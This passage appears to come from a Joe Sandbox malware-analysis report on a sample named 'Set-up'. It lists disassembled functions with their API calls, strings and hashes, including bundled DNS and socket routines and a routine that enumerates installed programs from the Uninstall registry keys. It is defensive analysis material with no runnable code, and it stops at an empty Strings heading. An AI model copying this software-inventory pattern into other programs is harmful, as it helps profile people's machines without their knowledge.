Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: 7e3d2fc00709fbe6d2d3909489eed4b08654339727e779d147a13c1b212f68b4
Instruction ID: fcea834c607ed9a32089c1ec03abd407406671127039a99e370f0cbeaa25c2d2
Opcode Fuzzy Hash: 7e3d2fc00709fbe6d2d3909489eed4b08654339727e779d147a13c1b212f68b4
Instruction Fuzzy Hash: 894169B0905345CFDB20EF66E48535DBBF0FB48300F14492DE9999B345DB3AA844DB61

Function 00B2B180 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00B2B2B6
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,00B13C41,00000000), ref: 00B2B3F7

Strings

cur != NULL, xrefs: 00B2B3F2
ares__sortaddrinfo.c, xrefs: 00B2B3ED

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assertgetsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 1186336949-2430778319
Opcode ID: 1e1b30b3611942dd9b077a37a2a6efb8a2e6252e03aa9ecad764cd2569552fe4
Instruction ID: 5e5247eb8a4d3ac7fc06ab9e02aec382dcfdb6991aca392f75a6f53a560a5b46
Opcode Fuzzy Hash: 1e1b30b3611942dd9b077a37a2a6efb8a2e6252e03aa9ecad764cd2569552fe4
Instruction Fuzzy Hash: 7FC17D316043259FD718DF24D891E6AB7E1FF98314F0488ACE8898B3A6DB35ED45CB81

Function 00A61160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00A611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
GetStartupInfoA.KERNEL32 ref: 00A61433

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 6fb65a7ef1baded47f561e4203899aa4a5e01418b21a77b1defa154408782ef2
Instruction ID: f91c12986051f2c3e3843c027dd06b7b44a7f60f7cf55df52f75a157d21a23e4
Opcode Fuzzy Hash: 6fb65a7ef1baded47f561e4203899aa4a5e01418b21a77b1defa154408782ef2
Instruction Fuzzy Hash: 0B519DB1A05305CFDB20EF6AE48575ABBF0FB48700F18452CE9859B345DB3AA944DBA1

Function 00B2A8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 00B2A90C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 5a659c526b3b43268a498082a9f941d742c4692ac4a46da811ddc1181c11db2b
Instruction ID: bb9ab091b26684ccb12548ad048bc256cfe352274fe6a75f85a98420479ff188
Opcode Fuzzy Hash: 5a659c526b3b43268a498082a9f941d742c4692ac4a46da811ddc1181c11db2b
Instruction Fuzzy Hash: 8BF01D75108358AFD2209F42EC48D6BBBFDEFC9764F0545ADF95C232119271AE14CA72

Function 00B1A440 Relevance: 93.8, APIs: 43, Strings: 10, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B1AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00B1AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B1AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B1AB30
RegCloseKey.KERNELBASE(?), ref: 00B1AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00B1AB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1ABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1ABF0
RegCloseKey.ADVAPI32(?), ref: 00B1AC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00B1AC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00B1AC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00B1ACB4
RegCloseKey.ADVAPI32(?), ref: 00B1ACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00B1AD0A
RegEnumKeyExA.KERNELBASE ref: 00B1AD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1ADB0
RegCloseKey.KERNELBASE(?), ref: 00B1ADD9
RegEnumKeyExA.KERNELBASE ref: 00B1AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00B1AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1AE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 00B1AEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B1AF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1AF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B1AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B1AFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B1B027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1B03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00B1B072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 00B1B0C1

Strings

Domain, xrefs: 00B1AAE3, 00B1AB2A, 00B1AF5D, 00B1AFAC
DhcpDomain, xrefs: 00B1B06C, 00B1B0BB
SearchList, xrefs: 00B1AA46, 00B1AA91, 00B1ABA7, 00B1ABEA, 00B1AE4E, 00B1AE9D
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00B1AB78
[%s]:%u, xrefs: 00B1A845
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00B1AD00
Software\Policies\Microsoft\System\DNSClient, xrefs: 00B1AC3C
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00B1AA0F
[%s]:%u%%%u, xrefs: 00B1A77D
PrimaryDNSSuffix, xrefs: 00B1AC6B, 00B1ACAE

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
API String ID: 1856363200-4239849775
Opcode ID: 4b196e0e7f36c05dee651912da841037bfa094c2857cf2fd2a60525d3baec1e4
Instruction ID: f0e1720b28329bea0b86458e6df2012ff4f054bf2fcaece46395cfb6537c6b36
Opcode Fuzzy Hash: 4b196e0e7f36c05dee651912da841037bfa094c2857cf2fd2a60525d3baec1e4
Instruction Fuzzy Hash: D482AE71608301AFE3209F25DC86B9B7BE8EF84740F54486CF989DB291E775E984CB52

Function 00B29740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 00B2978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00B297BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B297E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B298A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00B29920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B29946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00B29974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 00B29981
RegCloseKey.ADVAPI32(?), ref: 00B2998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B29992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00B297FE

Part of subcall function 00B278A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,00B2E16D,?), ref: 00B278AF
Part of subcall function 00B278A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00B278D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00B29C46

Strings

sts, xrefs: 00B299A2
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00B2993C
CARES_HOSTS, xrefs: 00B29788
#, xrefs: 00B29B9D
#, xrefs: 00B29A3F
DatabasePath, xrefs: 00B2996B
\hos, xrefs: 00B2999A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3843116398-4129964100
Opcode ID: 742d4b6f66a67731400844c8e1f391567fe48fd76033a074eaf52b194f981d70
Instruction ID: 6dfedd7eb81b6836b27dc91d537bb979fe14e691d21e9e63f131cf8eb4d0aa06
Opcode Fuzzy Hash: 742d4b6f66a67731400844c8e1f391567fe48fd76033a074eaf52b194f981d70
Instruction Fuzzy Hash: E932D3B1904211ABEB11AB24FC82A5B77E4EF54354F0844B8FC4D9A262FB32ED54D793

Function 00A62F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00A62FED
RegEnumKeyExA.KERNELBASE ref: 00A631A5

Strings

DisplayName, xrefs: 00A630BD
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00A62F5D
%s\%s, xrefs: 00A63028
app_name, xrefs: 00A630F0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00A62F49, 00A62F71
d, xrefs: 00A62FA0
index, xrefs: 00A63112
installed_apps, xrefs: 00A62F36

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: EnumOpen
String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 3231578192-3120786300
Opcode ID: 77216c65cd0f266c4c702932ea9d33ecc8d665dfee1478fba29ef3a5ebfe82c1
Instruction ID: 6bc0020acb1486d2064d1738c0ef2d12003ca4df81aa9f973f21c77cf2a6eb7a
Opcode Fuzzy Hash: 77216c65cd0f266c4c702932ea9d33ecc8d665dfee1478fba29ef3a5ebfe82c1
Instruction Fuzzy Hash: 0471D1B4904309DFDB50DF69D98579EBBF0BF84318F00885DE89897301E7789A899F92

Function 00C3E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00C3E637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00BCA31E), ref: 00C3E64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00BCA31E,00000001,?,00000008,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000), ref: 00C3E665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E), ref: 00C3E6A6
GetLastError.KERNEL32(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E6CC
GetLastError.KERNEL32(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6FA

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: d880813523fe24bddc48ddc55924fff63956a7aa4f208ab822d25667dc3ac3d3
Instruction ID: 5bf1b82ad88c8743d0617db877e2428281df649b96011d59dcc1086f48ae493b
Opcode Fuzzy Hash: d880813523fe24bddc48ddc55924fff63956a7aa4f208ab822d25667dc3ac3d3
Instruction Fuzzy Hash: 8431A171610204BFEB306A72DC4AF6B3769FB45721F148528FA56895C0EA35EE04CBA2

Function 00A98B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00A98C2F
WSAGetLastError.WS2_32 ref: 00A98C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00A98CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00A98D0E
WSAGetLastError.WS2_32 ref: 00A98D18
WSASetLastError.WS2_32(00000000), ref: 00A98E0C

Strings

local address %s port %d..., xrefs: 00A98C7F
connect to %s port %u from %s port %d failed: %s, xrefs: 00A98E78
connected, xrefs: 00A98DA7
cf-socket.c, xrefs: 00A98EDF
not connected yet, xrefs: 00A98BDC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: 3e82ae3ea8b4d2300de2a29737642a7ac690363e274279810c8a6c9ac4f4d11e
Instruction ID: 192b0f82a96689ae6dd72f403347bc729bff30c9466d0869b7de3b10fcbcc8eb
Opcode Fuzzy Hash: 3e82ae3ea8b4d2300de2a29737642a7ac690363e274279810c8a6c9ac4f4d11e
Instruction Fuzzy Hash: 2BB1B1707047059FDF20CF24C985BAABBE4AF46314F18852DE8598B2D2DB79EC54C7A2

Function 00A676A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?), ref: 00A676DE
send.WS2_32(multi.c,?,?,?), ref: 00A676EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00A67721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A67745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6774D

Strings

